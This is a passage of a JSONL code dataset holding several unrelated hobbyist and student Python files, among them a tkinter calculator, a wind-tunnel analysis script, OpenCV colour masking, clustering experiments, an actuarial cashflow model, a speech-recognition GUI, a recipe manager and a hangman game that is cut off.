tk.Button(self,text=\"=\",fg=\"white\",bg=\"orange\",font=h) \n self.t.grid(column=2, row=3,padx=(2,2),pady=(2,2))\n tv=self.t[\"text\"]\n self.t[\"command\"] = self.nik(self.show,tv,self.his)\n \n self.u = tk.Button(self,text=\"Ans\",fg=\"white\",bg=\"orange\",font=h,width=4) \n tv=self.u[\"text\"]\n self.u[\"command\"] = self.nik(self.show,tv,self.his)\n self.u.grid(column=3, row=3,padx=(2,2),pady=(2,2))\n\n self.w = tk.Button(self,text=\"ON\",fg=\"white\",bg=\"brown\",font=h,width=4) \n tv=self.w[\"text\"]\n self.w[\"command\"] = self.nik(self.show,tv,self.his)\n self.w.grid(column=4, row=3,padx=(2,2),pady=(2,2))\n\nroot = tk.Tk() # create frame\napp = MyUI(master=root) #master here is used to for storing the layouts after each function basically \napp.mainloop()\n","repo_name":"rakeshkhetwal/Calculator-on-tkinter-python","sub_path":"final calculator.py","file_name":"final calculator.py","file_ext":"py","file_size_in_byte":9859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3609000848","text":"import flowtools\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\n\r\n'''Step 1 - Measure reference pressure ratio at x_0, ppt_x0'''\r\npx0pt = 0.893 #0.781381 #Measured reference pressure ratio at x = 0 (change this to the correct value) \r\n#0.776 is the lowest it goes without giving an error (if you go lower then in flowtools you are taking the square root of a negative number somewhere in the calculation)\r\n\r\n\r\n\r\n'''Step 2 - Calculate local M and A(x_0) / A* using flowtools.py'''\r\nM_x0 = flowtools.flowisentropic2(1.4, px0pt, \"pres\")[0]\r\nAx0Astar = flowtools.flowisentropic2(1.4, px0pt, \"pres\")[4]\r\n\r\n\r\n\r\n'''Step 3 - Determine A(x_0) / A_t from given wind tunnel geometry'''\r\nAx0At = 1.175 #Using x_0 = 44.8 [mm] (first entry in Chapter 4, Table 1)\r\n\r\n\r\n'''Step 4 - Find A_t / A* (correction coefficient)'''\r\ncoeff = Ax0Astar / Ax0At\r\n\r\n\r\n\r\n'''Step 5 - For each value of x, determine A(x) / A_t from given wind tunnel geometry'''\r\nwith open(\"table1manual.txt\", \"r\") as file:\r\n lines = file.readlines()\r\n\r\nx_list = []\r\nAAt_list = []\r\n\r\nfor line in lines:\r\n if line != \"\" and line[0] != \"x\": \r\n numbers = line.split(\" \") \r\n 
x_list.append(float(numbers[0]))\r\n AAt_list.append(float(numbers[2]))\r\n\r\n\r\n\r\n'''Step 6 - For each value of x, calculate A(x) / A*'''\r\nAAstar_list = []\r\nfor i in AAt_list:\r\n AAstar_list.append(float(coeff * i))\r\n print(float(coeff * i))\r\n\r\nprint(\"coeff =\", coeff)\r\n\r\n\r\n'''Step 7 - For each value of x, find M(x) and p(x)/p_t using flowtools.py'''\r\nM_list = []\r\nppt_list = []\r\nfor i in AAstar_list:\r\n M = flowtools.flowisentropic2(1.4, i, \"sub\")[0]\r\n M_list.append(M)\r\n ppt = flowtools.flowisentropic2(1.4, i, \"sub\")[2]\r\n ppt_list.append(ppt)\r\n print(M)\r\n\r\n\r\n\r\n'''Plot'''\r\nplt.plot(x_list, M_list, \"black\", marker = \"o\", markersize = 5, markerfacecolor = \"none\", markeredgecolor = \"black\")\r\nplt.plot(x_list, ppt_list, \"red\", marker = \"o\", markersize = 5, markerfacecolor = \"none\", markeredgecolor = \"red\")\r\nplt.xlabel(\"x [mm]\")\r\nplt.ylabel(\"M [-], p/p$_t$ [-]\")\r\nplt.xlim(40, 200)\r\nplt.ylim(0, 1.1)\r\nplt.grid()\r\nplt.legend([\"Mach number\", \"Pressure ratio\"])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AlexisVandenHeede/HighSpeedWindTunnelTest","sub_path":"subsonic_correction.py","file_name":"subsonic_correction.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38461574458","text":"import pixelhouse.pixelhouse as ph\nimport glob, os\nimport pyflow\nfrom tqdm import tqdm\nfrom PIL import Image\nimport numpy as np\nimport time\n\nF_FRAMES = sorted(glob.glob(\"data/frames/*\"))[3072:]\n\nsave_dest = \"data/flows\"\nos.system(f'mkdir -p {save_dest}')\n\n# Flow Options:\nalpha = 0.05 ## SCALE PARAM\nratio = 0.75\nminWidth = 200\nnOuterFPIterations = 1\nnInnerFPIterations = 1\nnSORIterations = 1\ncolType = 0 # 0 or default:RGB, 1:GRAY (but pass gray image with shape (h,w,1))\n\nfrac = 0.25\nfrac = 0.5\nfor f0, f0b in zip(tqdm(F_FRAMES), F_FRAMES[1:]):\n\n #print(f0)\n \n f1 = os.path.join(save_dest, os.path.basename(f0)) + '.npy'\n\n #im1 = np.array(Image.open(f0))\n #im2 = np.array(Image.open(f0b))\n\n im1 = ph.load(f0)\n im2 = ph.load(f0b)\n img = im1.copy()\n img.img = np.abs(im1.img-im2.img)\n\n img.show()\n continue\n exit()\n\n im1 = ph.load(f0).resize(frac).rgb\n im2 = ph.load(f0b).resize(frac).rgb\n \n im1 = im1.astype(float) / 255.\n im2 = im2.astype(float) / 255.\n\n s = time.time()\n u, v, im2W = pyflow.coarse2fine_flow(\n im1, im2, alpha, ratio, minWidth, nOuterFPIterations,\n nInnerFPIterations,\n nSORIterations, colType)\n e = time.time()\n print('Time Taken: %.2f seconds for image of size (%d, %d, %d)' % (\n e - s, im1.shape[0], im1.shape[1], im1.shape[2]))\n flow = np.concatenate((u[..., None], v[..., None]), axis=2)\n print(flow, flow.shape)\n np.save(f1, flow)\n #np.save('examples/outFlow.npy', flow)\n\n import cv2\n hsv = np.zeros(im1.shape, dtype=np.uint8)\n hsv[:, :, 0] = 255\n hsv[:, :, 1] = 255\n mag, ang = cv2.cartToPolar(flow[..., 0], flow[..., 1])\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 2] = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX)\n rgb = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\n\n print(mag, mag.shape)\n mag = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8)\n #mag = np.clip(100*mag, 0, 255)\n #mag = mag.astype(np.uint8)\n print(mag.shape)\n print(mag)\n \n canvas = ph.Canvas()\n canvas.img = np.dstack([mag,mag,mag,])\n canvas.resize(1.0).show()\n 
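# (editor's note) The block above uses the common optical-flow colour coding: cv2.cartToPolar\n    # turns (u, v) into magnitude and angle, the angle is written to the hue channel and the\n    # normalised magnitude to the value channel, and the HSV image is converted back to BGR for\n    # display; the raw flow itself is saved separately with np.save(f1, flow). Note the early\n    # continue/exit() higher in the loop means this branch is currently skipped.\n    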
#exit()\n","repo_name":"thoppe/NewNewYork","sub_path":"P2_flowmaps.py","file_name":"P2_flowmaps.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"16686578602","text":"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom regex import F, P\r\nimport image as m\r\nimport pyttsx3\r\nfrom colorama import Back ,Fore,Style\r\nengine = pyttsx3.init()\r\nengine.setProperty('rate',130)\r\n\r\nclass color:\r\n def ColorCar(dim):\r\n im=m.name\r\n image = cv2.imread(im)\r\n image=cv2.resize(image,(300,300),cv2.INTER_AREA)\r\n # create NumPy arrays from the boundaries\r\n lower_red= np.array([17,15,100], dtype = \"uint8\")\r\n upper_red= np.array([33,33,255], dtype = \"uint8\")\r\n \r\n lower_blue= np.array([66,27,0], dtype = \"uint8\")\r\n upper_blue= np.array([255,243,69], dtype = \"uint8\")\r\n \r\n lower_green= np.array([12,38,0], dtype = \"uint8\")\r\n upper_green= np.array([84,255,190], dtype = \"uint8\")\r\n\r\n mask_red= cv2.inRange(image, lower_red, upper_red)\r\n output_red= cv2.bitwise_and(image, image, mask = mask_red)\r\n \r\n mask_blue= cv2.inRange(image, lower_blue, upper_blue)\r\n output_blue= cv2.bitwise_and(image, image, mask = mask_blue)\r\n \r\n mask_green= cv2.inRange(image, lower_green, upper_green)\r\n output_green= cv2.bitwise_and(image, image, mask = mask_green)\r\n\r\n \r\n#lower_Black = np.array([0,0,0],dtype=\"uint8\")\r\n#upper_Black = np.array([50,50,100],dtype=\"uint8\")\r\n#mask_Black= cv2.inRange(image, lower_Black, upper_Black)\r\n#output_Black= cv2.bitwise_and(image, image, mask = mask_Black)\r\n\r\n\r\n\r\n\r\n # show the images\r\n output1=np.hstack([image, output_red])\r\n output2=np.hstack([output_blue,output_green])\r\n output3=np.vstack([output1,output2])\r\n cv2.imshow(\"color\",output3)\r\n print(Fore.GREEN+\" The color of the car photo was recorded in its own folder\")\r\n engine.say('The color of the car photo was recorded in its own folder')\r\n engine.runAndWait()\r\n addin='C:\\\\Users\\\\admin\\\\Desktop\\\\main.py\\\\'+dim+'\\\\'+'color '+dim+'.jpg'\r\n cv2.imwrite(addin,output3)\r\n cv2.waitKey(0) & 0xFF\r\n cv2.destroyAllWindows()\r\n ","repo_name":"mehrdadJAVA/License-plate-recognition-with-Python","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15147373959","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import KMeans\nimport numpy as np\n\n\n#GMM 聚类算法\nclass ClassJoin(object):\n def __init__(self):\n self.path = \"D:\\mr\\data.txt\"\n\n def kmean(self):\n data = pd.read_csv(self.path,sep=' ')\n x = data[[\"calories\",\"sodium\",\"alcohol\",\"cost\"]]\n std = StandardScaler()\n a_std = std.fit_transform(x)\n km = KMeans(n_clusters=3)\n colors = np.array(['red', 'green', 'blue', 'yellow'])\n km.fit(a_std)\n data['flag'] = km.labels_\n print(data.sort_values(\"flag\"))\n pd.plotting.scatter_matrix(data, c=colors[data['flag']], alpha=1, figsize=(10,10), s=100)\n #聚类评估:轮廓函数\n from sklearn import metrics\n score_scaled = metrics.silhouette_score(x, data.flag)\n print(score_scaled)\n\n scores = []\n for k in range(2, 20):\n labels = KMeans(n_clusters=k).fit(x).labels_\n score = metrics.silhouette_score(x, labels)\n 
scores.append(score)\n print(scores)\n plt.plot(list(range(2, 20)), scores)\n\n def dbscan(self):\n colors = np.array(['red', 'green', 'blue', 'yellow'])\n from sklearn.cluster import DBSCAN\n data = pd.read_csv(self.path, sep=' ')\n x = data[[\"calories\", \"sodium\", \"alcohol\", \"cost\"]]\n db = DBSCAN(eps=10, min_samples=2).fit(x)\n data['flag'] = db.labels_\n pd.plotting.scatter_matrix(data, c=colors[data['flag']], alpha=1, figsize=(10, 10), s=100)\n\n\n def gmm(self):\n data = pd.read_csv(self.path, sep=' ')\n x = data[[\"calories\", \"sodium\", \"alcohol\", \"cost\"]]\n from sklearn.mixture import GaussianMixture\n gmm = GaussianMixture(n_components=4).fit(x)\n labels = gmm.predict(x)\n labels\n plt.scatter(x[:1],x[:2], c=labels, s=40, cmp='viridis')\n\n\n\nif __name__ == '__main__':\n ClassJoin().gmm()","repo_name":"LTongSpark/mult","sub_path":"data/聚类.py","file_name":"聚类.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16574569506","text":"import math\n\nupper_limitA = input(\"Enter limit:\")\n\nupper_limit = eval(upper_limitA)\n\npower_index = 0\npower = 1\n\nwhile power <= (upper_limit/2):\n power_index+=1\n power = power*2\n\nlist=[]\nfor i in range(3,upper_limit+1):\n list.append(i)\n\n\nfor i in range(power_index,1,-1):\n list.remove(int (math.pow(2,i)))\n\nlength = len(list)\nfor i in range (0,length+1,10):\n print (list[i:i+10])\n\n","repo_name":"mariakalfountzou/First-Coding-Bootcamb","sub_path":"Python_Part_II/Exercise 11.py","file_name":"Exercise 11.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18943547687","text":"# %%\nimport heavylight\nimport pandas as pd\nimport numpy as np\n\n# A Vectorised Actuarial Contingency Model\n\n# %%\nclass Life(heavylight.Model):\n time_step = 1/12\n\n def t(self, t):\n return np.ones(self.data[\"data_count\"]) * t\n \n def num_pols_if(self, t):\n if t == 0:\n return self.data[\"initial_policies\"]\n else:\n return self.num_pols_if(t - 1) - self.num_deaths(t - 1)\n \n def num_deaths(self, t):\n if t == 0:\n return np.zeros(self.data[\"data_count\"])\n else:\n return self.num_pols_if(t) * self.q_x_m(t)\n \n def age(self, t):\n \"\"\"age at time t\"\"\"\n if t == 0:\n return self.data[\"initial_age\"] # floating point\n else:\n return self.age(t-1) + Life.time_step\n \n def age_rounded(self, t):\n return np.round(self.age(t))\n \n def q_x_m(self, t):\n \"\"\"monthly mortality rate\"\"\"\n return self.q_x(t) ** (Life.time_step)\n \n def q_x(self, t):\n \"\"\"annual mortality rate\"\"\"\n return self.basis[\"mortality\"].values(self.age_rounded(t))\n \n def premium(self, t):\n #print(self.data[\"premium\"])\n #print(self.num_pols_if(t))\n return self.data[\"premium\"] * self.num_pols_if(t)\n \n def claim(self, t):\n #print(f\"claim: {len(self.num_deaths(t))=}\")\n #print(f\"claim: {len(self.data['sum_assured'])=}\")\n return self.num_deaths(t) * self.data[\"sum_assured\"]\n\n def net_cashflow(self, t):\n return self.premium(t) - self.claim(t)\n \n def mpnum(self, t):\n return self.data[\"mp_num\"]\n\n\n# %%\nmortality = heavylight.Table.from_csv(\"sample_q_x_table.csv\")\n\n# %%\nmortality.series.loc[np.array([20, 21])]\n\n# %%\nbasis = {\"mortality\": mortality}\n\n# %%\n\n\ndef make_random_data(num_pols):\n rng = np.random.default_rng(seed=42)\n return_data = {}\n return_data[\"data_count\"] = num_pols\n 
return_data[\"initial_policies\"] = np.ones(num_pols)\n return_data[\"mp_num\"] = np.arange(num_pols)\n return_data[\"initial_age\"] = rng.uniform(low=20.0, high=21.0, size=num_pols)\n return_data[\"premium\"] = rng.beta(a=2, b=5, size=num_pols) * 100 + 50\n return_data[\"sum_assured\"] = return_data[\"premium\"] * 100 # rng.uniform(low=10.0, high=20, size=num_pols)\n return return_data\n\n\"\"\"\ndata = {\n \"initial_policies\": np.ones(num_model_points),\n \"initial_age\" : np.array([32+1/12, 42, 25+7/12]),\n \"premium\": np.array([100.65, 500, 220.34]),\n \"sum_assured\": np.array([10000, 30000, 25000]),\n }\n\"\"\"\n\n# num_model_points = 3\n\n\n# %%\ndata = make_random_data(1000)\nmodel = Life(data=data, basis=basis) #, do_run=True, proj_len = 5)\n\n# %%\nmodel.RunModel(proj_len=120, verbose=True)\n#df = model.ToDataFrame()\n\n\n\n#for t in range(10):\n# print(t, model.net_cashflow(t))\n\n# %%\ndef expand(model, variable):\n \"\"\"return a variable from the model as a dataframe\n rows = time\n columns = variables\n \"\"\"\n temp_df = pd.DataFrame(getattr(model, variable).values).T\n temp_df.index.name = \"t\"\n return temp_df\n# %%\ndef get_single_result(model, index):\n temp_df = model.ToDataFrame()\n # TODO: check type of each column\n # TODO: check that index is not out of bounds\n for column in temp_df:\n if isinstance(temp_df[column].iloc[0], np.ndarray):\n temp_df[column] = temp_df[column][index]\n return temp_df\n #return temp_df.applymap(lambda x: x[index])\n\n# %%\n\ndef dfize(model):\n columns = {}\n for func in model._funcs:\n func_values = getattr(model,func).values\n if isinstance(list(func_values.values())[0], np.ndarray):\n # multi-index\n temp_df = pd.DataFrame(func_values).T.stack()\n columns[func] = temp_df\n else:\n print(f\"Still to deal with {func}\")\n return pd.concat(columns, axis=1)\n\n\n # convert \n\n# %%\ndf = dfize(model)\ndf[df.mpnum==500].plot(x=\"t\", y=\"net_cashflow\") # can filter on a model point\n# %%\ndef npv(rate, values):\n values = np.atleast_2d(values)\n timestep_array = np.arange(0, values.shape[1])\n npv = (values / (1 + rate) ** timestep_array).sum(axis=1)\n try:\n # If size of array is one, return scalar\n return npv.item()\n except ValueError:\n # Otherwise, return entire array\n return npv\n# %%\nprint(\"npv\", npv(0.08, df[df.mpnum==500][\"net_cashflow\"]))\n# %%\nnpvs_4pc = df.groupby(\"mpnum\").agg({\"net_cashflow\": lambda x: npv(0.04, x)})\n# %%\n","repo_name":"lewisfogden/heavylight","sub_path":"examples/notebook/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"7973663225","text":"# -*- coding: utf-8 -*-\n\nimport pyaudio\nimport wave\nimport json\nimport requests\nimport base64\nfrom tkinter import *\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '你的 App ID'\nAPI_KEY = '你的 Api Key'\nSECRET_KEY = '你的 Secret Key'\n\n\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n\ndef get_token():\n host = 'https://aip.baidubce.com/oauth/2.0/token'\n grant_type = 'client_credentials'\n data = {'grant_type': grant_type, 'client_id': API_KEY, 'client_secret': SECRET_KEY}\n response = requests.post(host, data)\n token = response.json()['access_token']\n return token\n\n\ndef recognize(audio, token):\n url = 'http://vop.baidu.com/server_api'\n size = len(audio)\n data = {\n \"format\": \"wav\",\n \"rate\": 16000,\n \"dev_pid\": 1536,\n \"channel\": 1,\n \"token\": token,\n 
\"cuid\": APP_ID,\n \"len\": size,\n \"speech\": base64.b64encode(audio).decode('utf8'),\n }\n result = requests.post(url, json.dumps(data))\n rs = result.json()\n return rs\n\n\ndef ns():\n filePath = 'audio/output.wav'\n token = get_token()\n audio = get_file_content(filePath)\n rs = recognize(audio, token)\n\n if rs['err_msg'] == 'success.':\n rt = \"识别成功!\\n\" \\\n \"识别结果:\" + str(rs['result'][0])\n else:\n rt = \"识别失败!!!\\n\" \\\n \"错误码:\" + str(rs['err_no']) + \"\\n\" \\\n \"错误码描述:\" + rs['err_msg']\n\n return rt\n\n\ndef rc():\n CHUNK = 1600\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n RATE = 16000\n RECORD_SECONDS = 5\n WAVE_OUTPUT_FILENAME = \"audio/output.wav\"\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n print(\"* 录音开始\")\n\n frames = []\n\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n\n print(\"* 录音结束\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n\ndef netspeech():\n List.delete(0.0, END)\n List.insert(END, '录音开始\\n')\n List.update()\n rc()\n List.insert(END, '录音结束,正在识别,请耐心等待\\n')\n List.update()\n text = ns()\n List.insert(END, '识别结果为:\\n')\n List.insert(END, text)\n List.update()\n\n\nif __name__ == '__main__':\n win = Tk()\n win.title('语音识别')\n button = Button(win, text='直接识别', width=15, command=netspeech)\n button.grid(row=1, column=1, padx=20, pady=20)\n List = Text(win)\n List.grid(row=2, column=1, padx=20, pady=20)\n win.mainloop()\n","repo_name":"Ar7hurK/Speech","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33159799570","text":"from tokens import Token\n\n\nclass ExpressionNode:\n pass\n\n\nclass StatementsNode(ExpressionNode):\n\n def __init__(self):\n self.nodes = []\n\n def add_node(self, node: ExpressionNode):\n self.nodes.append(node)\n\n\nclass VariableNode(ExpressionNode):\n def __init__(self, variable: Token):\n self.variable = variable\n\n\nclass BinOperationNode(ExpressionNode):\n\n def __init__(self,\n operator: Token,\n left: ExpressionNode,\n right: ExpressionNode):\n self.operator = operator\n self.left = left\n self.right = right\n\n\nclass LogicalOperationNode(BinOperationNode):\n pass\n\n\nclass UnarOperationNode(ExpressionNode):\n def __init__(self, operator: Token, operand: ExpressionNode):\n self.operator = operator\n self.operand = operand\n\n\nclass NumberNode(ExpressionNode):\n def __init__(self, number: Token):\n self.number = number\n\n\nclass StringNode(ExpressionNode):\n def __init__(self, string: Token):\n string.text = string.text.replace(\"\\\"\", \"\") # Удаляем лишние ковычки\n self.string = string\n\n\nclass BooleanNode(ExpressionNode):\n def __init__(self, boolean: Token):\n self.boolean = boolean\n\n\nclass IfNode(ExpressionNode):\n def __init__(self, token: Token, cond: LogicalOperationNode, stms: StatementsNode):\n self.token = token\n self.cond = cond\n self.stms = stms\n\nclass ElseNode(ExpressionNode):\n def __init__(self, token: Token, stms: StatementsNode):\n self.token = token\n self.stms = stms\n\nclass WhileNode(ExpressionNode):\n def __init__(self, token: Token, cond: LogicalOperationNode, stms: StatementsNode):\n 
self.token = token\n self.cond = cond\n self.stms = stms\n\nclass ForNode(ExpressionNode):\n def __init__(self, token: Token, cond_stms, stms: StatementsNode):\n self.token = token\n self.cond = cond_stms\n self.stms = stms\nclass FunctionDeclarationNode(ExpressionNode):\n def __init__(self, id: Token, variables: list[Token], stms: StatementsNode):\n self.variables = variables\n self.token = id\n self.stms = stms\n\nclass FunctionInvokeNode(ExpressionNode):\n def __init__(self, id:Token, variables: list[Token]):\n self.token = id\n self.variables = variables\n\n\ndef print_ast(node: ExpressionNode, level=-1):\n offset_char = \"-\\t\"\n if isinstance(node, StatementsNode):\n for i in node.nodes:\n print_ast(i, level + 1)\n return\n if isinstance(node, VariableNode):\n print((offset_char * level) + str(node.variable))\n return\n if isinstance(node, NumberNode):\n print((offset_char * level) + str(node.number))\n return\n if isinstance(node, StringNode):\n print((offset_char * level) + str(node.string))\n return\n if isinstance(node, BooleanNode):\n print((offset_char * level) + str(node.boolean))\n return\n if isinstance(node, UnarOperationNode):\n print(str(offset_char * level) + \"UnarOperation: \" + str(node.operator))\n print_ast(node.operand, level + 1)\n return\n if isinstance(node, BinOperationNode):\n if isinstance(node, LogicalOperationNode):\n print(str(offset_char * level) + \"LogicalOperation: \" + str(node.operator))\n else:\n print(str(offset_char * level) + \"BinOperation: \" + str(node.operator))\n\n print(str(offset_char * level) + \"left: \")\n print_ast(node.left, level + 1)\n print(str(offset_char * level) + \"right: \")\n print_ast(node.right, level + 1)\n return\n if isinstance(node, IfNode):\n print(str(offset_char * level) + \"IfStatement: \" + str(node.token))\n print(str(offset_char * level) + \"Condition: \")\n print_ast(node.cond, level + 1)\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level + 1)\n return\n if isinstance(node, ElseNode):\n print(str(offset_char * level) + \"ElseStatement: \" + str(node.token))\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level + 1)\n return\n if isinstance(node, WhileNode):\n print(str(offset_char * level) + \"WhileNode: \" + str(node.token))\n print(str(offset_char * level) + \"Condition: \")\n print_ast(node.cond, level + 1)\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level + 1)\n return\n if isinstance(node, ForNode):\n print(str(offset_char * level) + \"FOR: \" + str(node.token))\n print(str(offset_char * level) + \"Condition: \")\n for i in node.cond:\n print_ast(i, level+1)\n print(str(offset_char * level) + \"Stms: \")\n print_ast(node.stms, level+1)\n if isinstance(node, FunctionDeclarationNode):\n print(str(offset_char * level) + \"FunctionDeclaration: \" + str(node.token))\n print(str(offset_char * level) + \"Variables:\")\n for v in node.variables:\n print(str(offset_char * level) + \"- VAR: \" + str(v))\n print(str(offset_char * level) + \"Stms:\")\n print_ast(node.stms, level + 1)\n if isinstance(node, FunctionInvokeNode):\n print(str(offset_char * level) + \"FunctionInvocation: \" + str(node.token))\n print(str(offset_char * (level+1)) + \"Variables:\")\n for v in node.variables:\n if isinstance(v, Token):\n print(str(offset_char * level) + \" token: \" + str(v))\n else:\n print_ast(v, 
level+1)\n\n\n","repo_name":"santygo1/translator","sub_path":"abs_st.py","file_name":"abs_st.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8353041806","text":"import json\nimport os\n\nMETADATA_FILE=\"config.json\"\nCONFIG_DICT = None\n\ndef create_recipe(recipe_name, cuisine_type, ingredients):\n if not os.path.exists(CONFIG_DICT[\"main_folder\"] + \"/{}\".format(cuisine_type)):\n os.makedirs(CONFIG_DICT[\"main_folder\"] + \"/{}\".format(cuisine_type))\n\n with open(CONFIG_DICT[\"main_folder\"] + \"/{}/{}.txt\".format(cuisine_type, recipe_name), 'w+') as f:\n f.write(ingredients)\n\ndef add_recipe():\n recipe_name = input(\"\"\"Enter name of the recipe\\n{}\\n\"\"\".format(\"*\" * 50))\n cuisine_type = input(\"\"\"Enter type of cuisine like Indian, Arabian etc.\\n{}\\n\"\"\".format(\"*\" * 50))\n total_portion = input(\"\"\"Enter Total portion in mg\\n{}\\n\"\"\".format(\"*\" * 50))\n ingredients = input(\"\"\"Enter ingredients and amount in ingredient=amount(in mg) format. Each ingredient in a separate line\\n{}\\n\"\"\".format(\"*\" * 50))\n ingredients += \"\\nTotal Portion={}\".format(total_portion)\n create_recipe(recipe_name, cuisine_type, ingredients)\n\ndef list_recipes():\n pass\n\ndef text_file_path_to_dict(file_path):\n with open(file_path,'r') as f:\n text = f.read()\n\n if text:\n return {line.split(\"=\")[0].strip():line.split(\"=\")[1].strip() for line in text.split(\"\\n\") if line}\n\n return dict()\n\ndef print_recipe(recipe_path, recipe_name, file_path):\n with open(file_path,'r') as f:\n text = f.read()\n print(\"Cuisine Type: {}\\nRecipe Name: {}\\nIngredients: \\n\\n{}\\n{}\\n\".format(\"-->\".join(recipe_path), recipe_name, text, \"*\" * 50))\n\ndef filter_recipes():\n exclude_ingredients = input(\"\"\"Enter ingredients that needs to be excluded from the recipe comma separated.\\n{}\\n\"\"\".format(\"*\" * 50))\n include_ingredients = input(\"\"\"Enter ingredients that needs to be included in the recipe comma separated.\\n{}\\n\"\"\".format(\"*\" * 50))\n\n exclude_ingredients_list = [x.strip() for x in exclude_ingredients.split(\",\")]\n include_ingredients_list = [x.strip() for x in include_ingredients.split(\",\")]\n\n for root, dirs, files in os.walk(\"Main\"):\n path = root.split(os.sep)\n for file in files:\n file_path = \"/\".join(path + [file])\n ingredient_dict = text_file_path_to_dict(file_path)\n\n if (any(x in ingredient_dict.keys() for x in include_ingredients_list) or not include_ingredients) and not any(x in ingredient_dict.keys() for x in exclude_ingredients_list):\n print_recipe(path[1:], file.split(\".txt\")[0], file_path)\n\n # print(\"-->\".join(file_path[1:]))\n\n\ndef modify_recipe():\n pass\n\ndef get_config():\n with open(METADATA_FILE, 'r') as f:\n return json.load(f)\n\ndef main_function():\n global CONFIG_DICT\n\n CONFIG_DICT = get_config()\n options=\"\"\"Enter an option from the below\n 1. Add a recipe\n 2. List recipes\n 3. Filter recipes\n 4. 
Modify total portion of a recipe\n {}\n \"\"\".format(\"*\"*50)\n selected_option = input(options)\n print(selected_option)\n if selected_option == \"1\":\n add_recipe()\n elif selected_option == \"2\":\n list_recipes()\n elif selected_option == \"3\":\n filter_recipes()\n elif selected_option == \"4\":\n modify_recipe()\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n main_function()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"shanto12/rose_diet_software","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20707370021","text":"\"\"\"\nQuestion: https://leetcode.com/problems/repeated-dna-sequences/\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n\n windowLength = 10\n previouslySeen = set()\n resultSet = set()\n for i in range(0, len(s)):\n currentSequence = s[i:i+windowLength]\n if currentSequence in previouslySeen:\n resultSet.add(currentSequence)\n else:\n previouslySeen.add(currentSequence)\n\n return resultSet\n\n\ntestCases = [\n {\n \"s\": \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\",\n \"output\": [\"AAAAACCCCC\", \"CCCCCAAAAA\"]\n },\n {\n \"s\": \"AAAAAAAAAAAAA\",\n \"output\": [\"AAAAAAAAAA\"]\n }\n]\n\n\nfor testCase in testCases:\n runner = Solution()\n result = runner.findRepeatedDnaSequences(testCase[\"s\"])\n print(result)\n","repo_name":"rupinjairaj/rupinjairaj.github.io","sub_path":"submissions/slidingWindow/repeatedDNASequences.py","file_name":"repeatedDNASequences.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18839810622","text":"\"\"\"\nda un'idea online anonima\nriadattamento per il laboratorio python delle scuole superiori di Monfalcone e Staranzano\nautore: Maurizio Colautti\nctrl.mau@gmail.com \n\nnota: la versione corrente e' volutamente semplificata per poter adattarsi\n ad una lezione di 3 ore per ragazzi con un certo tipo di competenze\n\"\"\"\n\nimport time\nimport random\n\nprint(\"\\nBenvenuto al gioco dell'impiccato\\n\")\nnome = input(\"Come ti chiami? \") # comando per interagire con l'utente\nprint(\"Ciao \" + nome + \"! 
